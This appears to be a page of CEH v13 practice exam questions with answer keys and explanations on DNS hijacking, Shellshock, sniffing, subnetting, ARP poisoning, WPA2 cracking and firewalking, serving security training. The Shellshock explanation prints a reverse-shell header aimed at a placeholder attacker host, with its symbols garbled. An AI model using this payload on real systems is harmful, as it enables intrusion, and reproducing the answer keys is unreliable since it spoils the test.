EC-COUNCIL 312-50V13 Online Practice Questions and Exam Preparation

EC-COUNCIL 312-50V13 Online Questions & Answers

• Question 681:

  A web server was compromised through DNS hijacking. What would most effectively prevent this in the future?

  A. Changing IP addresses
  B. Regular patching
  C. Implementing DNSSEC
  D. Using LAMP architecture
  C. Implementing DNSSEC

  ---

  Explanation

  DNS hijacking occurs when attackers manipulate DNS responses to redirect traffic to malicious servers. CEH v13 clearly identifies DNSSEC (Domain Name System Security Extensions) as the primary defense against such attacks.

  DNSSEC adds cryptographic signatures to DNS records, enabling clients to verify authenticity and integrity of DNS responses. Without DNSSEC, attackers can spoof DNS responses even if servers are fully patched.

  Changing IP addresses and using LAMP do not address DNS trust. Patching is essential but does not prevent DNS spoofing.

  CEH v13 explicitly recommends DNSSEC for preventing cache poisoning and DNS hijacking attacks, making Option C the correct answer.

• Question 682:

  A CEH has mirrored a website, identified session hijacking risk, and wants to minimize detection. What is the most appropriate next step?

  A. Attempt SQL Injection
  B. Hijack a session and modify server configuration
  C. Launch brute-force attacks
  D. Perform automated vulnerability scanning
  B. Hijack a session and modify server configuration

  ---

  Explanation

  According to CEH v13 System Hacking and Web Application Hacking , once reconnaissance and footprinting are complete, attackers typically move into controlled exploitation while maintaining stealth. Since the CEH has already identified a session hijacking vulnerability , leveraging that weakness is the most logical and stealthy progression.

  Session hijacking allows attackers to impersonate legitimate users without triggering authentication alerts , making it significantly less detectable than brute-force or scanning activities. Option B aligns with CEH methodology: hijacking a valid session provides authorized-level access, which can then be abused to make configuration changes discreetly.

  SQL injection (Option A) may trigger database errors and IDS alerts. Brute-force attacks (Option C) are noisy and easily logged. Automated vulnerability scanning (Option D) generates excessive traffic and is typically avoided once exploitation begins.

  CEH v13 emphasizes using already-identified weaknesses and minimizing footprint during exploitation.

• Question 683:

  What is the most common method to exploit the "Bash Bug" or "Shellshock" vulnerability?

  A. SYN Flood
  B. SSH
  C. Through Web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable to a vulnerable Web server
  D. Manipulate format strings in text fields
  C. Through Web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable to a vulnerable Web server

  ---

  Explanation

  In CEH v13 Module 06: Malware Threats, the Shellshock vulnerability (CVE-2014-6271) is described as a severe bug in the Bash shell where specially crafted environment variables could be used to execute arbitrary commands.

  The most common attack vector: Web servers using CGI scripts written in Bash.

  Attackers send malicious HTTP requests to CGI endpoints where Bash executes commands.

  Exploitation looks like:

  User-Agent: () { :;}; /bin/bash -i >and /dev/tcp/attacker_ip/4444 0>and1

  CEH v13 Module 06 - Shellshock Vulnerability Explanation

  National Vulnerability Database: CVE-2014-6271

• Question 684:

  When conducting a penetration test, it is crucial to use all means to get all available information about the target network. One of the ways to do that is by sniffing the network. Which of the following cannot be performed by passive network sniffing?

  A. Identifying operating systems, services, protocols and devices
  B. Modifying and replaying captured network traffic
  C. Collecting unencrypted information about usernames and passwords
  D. Capturing a network traffic for further analysis
  B. Modifying and replaying captured network traffic

  ---

  Explanation

  Passive sniffing refers to listening to or capturing network traffic without sending any packets or altering the communication stream. The attacker's system operates in "promiscuous mode" to monitor all traffic flowing through the network segment. This technique is mostly used in environments like hub-based or unencrypted Wi-Fi networks, where traffic is visible to all systems.

  According to the CEH v13 Official Courseware, Module 08: Sniffing, under the subsection "Passive Sniffing", the following capabilities are associated with passive sniffing:

  Capturing unencrypted credentials (usernames and passwords)

  Identifying protocols, services, IP addresses, and hostnames

  Monitoring HTTP sessions, cookies, and other clear-text traffic

  Gathering detailed information for fingerprinting and enumeration

  Exporting traffic to PCAPs for forensic and offline analysis

  However, passive sniffing does not involve any active interference with the traffic. Therefore, actions like "modifying and replaying" packets require an attacker to craft and inject packets into the network - this is considered active sniffing or traffic manipulation, which is out of scope for passive techniques.

  Thus:

  Option A: Valid for passive sniffing (host discovery via captured traffic)

  Option B: Invalid for passive sniffing (requires active traffic manipulation) Option C: Valid (if data is unencrypted)

  Option D: Valid (captures traffic for offline review)

  CEH v13 Official Courseware:

  Module 08: Sniffing

  Section: "Passive Sniffing vs Active Sniffing"

  Study Guide Pages: Usually found under "Types of Sniffing Techniques"

  CEH iLabs/Engage Scenarios: Packet capture and Wireshark lab modules

• Question 685:

  Which attack best demonstrates covert eavesdropping via smartphone sensors?

  A. Malicious APK exploitation
  B. Man-in-the-Disk attack
  C. Spearphone attack
  D. Tap `n Ghost attack
  C. Spearphone attack

  ---

  Explanation

  The Spearphone attack , covered in CEH v13 Mobile Platform Hacking , exploits smartphone accelerometers to infer speech vibrations from loudspeakers-without microphone permissions.

  This attack demonstrates how built-in sensors can be abused for covert surveillance, making it ideal for assessing privacy risks.

  Other options involve different attack vectors not related to sensor-based eavesdropping.

• Question 686:

  You are tasked to configure the DHCP server to lease the last 100 usable IP addresses in subnet 10.1.4.0/23. Which of the following IP addresses could be leased as a result of the new configuration?

  A. 210.1.55.200
  B. 10.1.4.254
  C. 10.1.5.200
  D. 10.1.4.156
  C. 10.1.5.200

  ---

  Explanation

  Comprehensive and Detailed Explanation:

  Subnet 10.1.4.0/23 includes addresses from:

  10.1.4.0 to 10.1.5.255

  Total = 512 IPs (510 usable)

  Last 100 usable IPs would be:

  Start: 10.1.5.155 to 10.1.5.254

  Only option C (10.1.5.200) falls within that range.

  From CEH v13 Courseware:

  Module 3: Subnetting and IP Addressing

  IP Subnet Calculators and RFC 950

• Question 687:

  Which type of sniffing technique is generally referred as MiTM attack?

  

  A. Password Sniffing
  B. ARP Poisoning
  C. MAC Flooding
  D. DHCP Sniffing
  B. ARP Poisoning

  ---

  Explanation

  Comprehensive and Detailed Explanation:

  ARP Poisoning (Address Resolution Protocol Poisoning) is a classic Man-in-the-Middle (MiTM) attack in a LAN environment. It works by sending fake ARP replies to devices on a network to associate the attacker's MAC address with the IP address of another host (typically the default gateway). As a result:

  Network traffic meant for the gateway is sent to the attacker instead.

  The attacker can then intercept, modify, or forward the traffic to the actual destination, performing a full MiTM.

  This allows the attacker to:

  Sniff sensitive data (e.g., credentials, emails)

  Hijack sessions

  Inject malicious payloads

  From CEH v13 Courseware:

  Module 8: Sniffing

  Topic: MiTM Attacks # ARP Spoofing Techniques

  Incorrect Options:

  A. Password Sniffing is a result of MiTM but not a technique itself.

  C. MAC Flooding is a switch attack that floods the CAM table to make the switch act like a hub.

  D. DHCP Sniffing relates to capturing DHCP messages but is not commonly used for MiTM.

  CEH v13 Study Guide - Module 8: ARP Poisoning and MiTM AttacksOWASP Network Threats - ARP Spoofing

• Question 688:

  A penetration tester is tasked with compromising a company's wireless network, which uses WPA2-PSK encryption. The tester wants to capture the WPA2 handshake and crack the pre-shared key. What is the most appropriate approach to achieve this?

  A. Execute a Cross-Site Scripting (XSS) attack on the router's admin panel
  B. Use a de-authentication attack to force a client to reconnect, capturing the WPA2 handshake
  C. Perform a brute-force attack directly on the WPA2 encryption
  D. Conduct a Man-in-the-Middle attack by spoofing the router's MAC address
  B. Use a de-authentication attack to force a client to reconnect, capturing the WPA2 handshake

  ---

  Explanation

  CEH training outlines the standard methodology for attacking WPA2-PSK networks: capture the 4-way handshake and then attempt offline cracking of the pre-shared key. The most reliable way to force handshake generation is to perform a de-authentication attack using tools like Aireplay-ng. This attack momentarily disconnects a wireless client, forcing it to reauthenticate with the access point. During this reauthentication, the AP and client exchange the 4-way handshake packets necessary for offline cracking. CEH emphasizes that WPA2 encryption itself cannot be brute-forced directly; attackers must obtain the handshake and then apply dictionary or brute-force attacks offline. Attempting XSS or router spoofing does not capture the handshake and is unrelated to WPA2 key extraction. The deauth attack is also a classic wireless attack vector described extensively in CEH because it is effective, does not require interaction with the encryption algorithm, and works regardless of the strength of the AP's passphrase. Once the handshake is captured, tools such as Hashcat are used to attempt key recovery.

• Question 689:

  What is the way to decide how a packet will move from an untrusted outside host to a protected inside that is behind a firewall, which permits the hacker to determine which ports are open and if the packets can pass through the packet-filtering of the firewall?

  A. Session hijacking
  B. Firewalking
  C. Man-in-the-middle attack
  D. Network sniffing
  B. Firewalking

  ---

  Explanation

  Firewalking is a technique used to determine what layer 4 protocols a firewall will allow by sending crafted packets with TTL values that expire at the firewall and analyzing ICMP Time Exceeded responses. This helps in determining what ports and services are allowed through a firewall.

  # Reference: CEH v13 Study Guide, Module 11: Evading IDS, Firewalls, and Honeypots

  "Firewalking is a technique used to gather information about firewalls and their rule sets by sending packets with TTL values that expire at the firewall."

  # Incorrect options:

  A. Session hijacking refers to taking over an active session.

  C. MITM attacks involve intercepting communications between two parties.

  D. Network sniffing involves capturing packets, not probing firewall rules.

• Question 690:

  You went to great lengths to install all the necessary technologies to prevent hacking attacks, such as expensive firewalls, antivirus software, anti-spam systems and intrusion detection/prevention tools in your company's network. You have configured the most secure policies and tightened every device on your network. You are confident that hackers will never be able to gain access to your network with complex security system in place.

  Your peer, Peter Smith who works at the same department disagrees with you. He says even the best network security technologies cannot prevent hackers gaining access to the network because of presence of "weakest link" in the security chain.

  What is Peter Smith talking about?

  A. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain
  B. "zero-day" exploits are the weakest link in the security chain since the IDS will not be able to detect these attacks
  C. "Polymorphic viruses" are the weakest link in the security chain since the Anti-Virus scanners will not be able to detect these attacks
  D. Continuous Spam e-mails cannot be blocked by your security system since spammers use different techniques to bypass the filters in your gateway
  A. Untrained staff or ignorant computer users who inadvertently become the weakest link in your security chain

  ---

  Explanation